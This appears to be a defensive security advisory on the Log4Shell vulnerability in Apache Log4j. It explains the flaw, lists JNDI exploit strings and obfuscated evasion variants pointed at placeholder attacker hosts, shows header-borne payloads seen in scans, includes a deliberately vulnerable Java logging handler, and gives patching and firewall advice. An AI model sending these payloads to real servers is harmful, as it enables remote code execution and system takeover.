Log4J Vulnerability Remediation:

What Is Log4j?

Log4j is a Java library used to log messages, including error messages, in applications. Web apps, cloud services, and email platforms use it, and so does a large proportion of Java programs on both the server and the client side.

What Is Log4j vulnerability?

The vulnerability in Log4j allows attackers to run arbitrary code and gain access to a computer system. Threat actors can take control of vulnerable internet-facing servers simply by feeding them a malicious text string.

The vulnerability, CVE-2021-44228, allows remote attackers to take control of susceptible devices. An attacker only has to send a simple malicious request containing specially formatted text; the log4j library then picks it up when the value is logged.

The vulnerability is caused by a lack of sanitization in the log4j library's lookup function. An attacker can use JNDI (Java Naming and Directory Interface) to make the library request a remote malicious resource with a string such as: ${jndi:ldap:/[attacker domain]/file}

An attacker can build many variants of the attack string by using different protocols, such as LDAP and RMI, and lookups such as upper and lower. Furthermore, we noticed several obfuscation strategies intended to evade detection:

${${::-j}ndi:rmi://[attacker_domain/file]}
${${lower:jndi}:${lower:rmi}://[attacker_domain/file]}
${${upper:${upper:jndi}}:${upper:rmi}://[attacker_domain]/file}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://[attacker_domain]/file}

Perhaps the most concerning element of the Log4j vulnerability is its ubiquity. An attacker who uses this flaw to execute code remotely can:

  • Use the impacted device or application to gain access to the whole network
  • Execute any code
  • Access all data on the affected device or application
  • Remove or encrypt files

The Chain of Infection

The malicious payload downloads a PowerShell script, which begins the malware installation process.
The IP address 2[.]56.59.123, which hosts the malicious files, is based in the United States and serves a number of malicious files, including a Linux ELF cryptocurrency miner and Cobalt Strike.

[Figure: log4j infection chain]

We discovered exploit attempts using the standard attack payload:

${jndi:ldap://<MALICIOUS DOMAIN>/Exploit} 

We discovered some intriguing variances and trends:

Scanners Have Used It

Interestingly, we discovered cases in which a single IP attempted to deliver the malicious payload via a wide range of HTTP headers in a series of attempts:

Access-Control-Request-Method: ${jndi:ldap://<REDACTED_IP>:42468/a}
Access-Control-Request-Headers: ${jndi:ldap://<REDACTED_IP>:42468/a}
Warning: ${jndi:ldap://<REDACTED_IP>:42468/a}
Authorization: ${jndi:ldap://<REDACTED_IP>:42468/a}
TE: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Charset: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Datetime: ${jndi:ldap://<REDACTED_IP>:42468/a}
Date: ${jndi:ldap://<REDACTED_IP>:42468/a}
Expect: ${jndi:ldap://<REDACTED_IP>:42468/a}
Forwarded: ${jndi:ldap://<REDACTED_IP>:42468/a}
From: ${jndi:ldap://<REDACTED_IP>:34467/a}
X-Api-Version: ${jndi:ldap://<REDACTED_IP>:42468/a}
Max-Forwards: ${jndi:ldap://<REDACTED_IP>:34467/a}

Such behaviour might be linked to the Qualys vulnerability scanner, which claims to have added a variety of tests that deliver Log4j payloads over several HTTP headers. While it is encouraging to see pen-testing and scanning tools adopt this new vulnerability so quickly, one cannot help but worry what would happen if malicious actors employed the same tools.

Sinkholes Created

By inspecting attack data, we were able to identify sinkhole addresses that were used to test susceptible devices. Sinkholes are internet-facing servers that collect the traffic generated when a proof-of-concept (PoC) exploit succeeds on a vulnerable device.

A large number of HTTP requests with headers like the ones below indicate the use of a sinkhole:

User-Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent

User-Agent: ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}

The sinkhole hostname encodes the protocol and the header through which the exploit attempt succeeded.

This is a real-world header:

X-Api-Version: ${jndi:ldap://<REDACTED>.burpcollaborator.net/a

This is an example of how the Burp Collaborator platform can be used to sinkhole successful PoCs. The choice of header is unusual, which shows that security testing tools, too, attempt to avoid detection.

Which Systems and Devices Are at Risk?

Every major Java-based corporate program and server uses Log4j. Because of its extensive use in software programs and internet services, many services are vulnerable to this attack. Any internet-connected device that runs Apache Log4j versions 2.0 to 2.14.1 is at risk.

How to Protect Yourself From the Log4j Vulnerability

There are several ways to mitigate this vulnerability. Below are some tips on how to protect against it.

Locate the Log4j Vulnerability

Once a complete review of where the application integrates Log4j has been carried out, any mistakes or vulnerable logging calls will be highlighted.

The following snippet demonstrates how log forging is feasible and how an attacker can change log records:

import java.io.IOException;

import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class SampleTest implements HttpHandler {
    static Logger log = LogManager.getLogger(SampleTest.class.getName());

    @Override
    public void handle(HttpExchange http) throws IOException {
        // The attacker-controlled header value is logged unchanged; on Log4j 2.0 to 2.14.1
        // a ${jndi:...} lookup inside it is resolved by the logger itself.
        String api = http.getRequestHeaders().getFirst("X-Api-Version");
        log.info("Version:{}", api);
    }
}

Updates and Patching

You should act quickly to locate internet-facing Log4j devices and upgrade them to the latest version.

Additionally, you should install any updates and security patches offered by manufacturers and suppliers as they become available. As an example, Minecraft has already recommended that users upgrade the game to avoid difficulties. Other open-source programs, such as Paper, are also publishing patches to address the issue.

Create Log4j-specific rules in the Web Application Firewall

At the time, installing a Web Application Firewall (WAF) was the best method of defence against Log4j. If your business already has a WAF in place, it is recommended to apply Log4j-specific rules.

In this way you can protect your apps from Log4j by identifying and blocking harmful character strings on upstream devices such as a WAF.
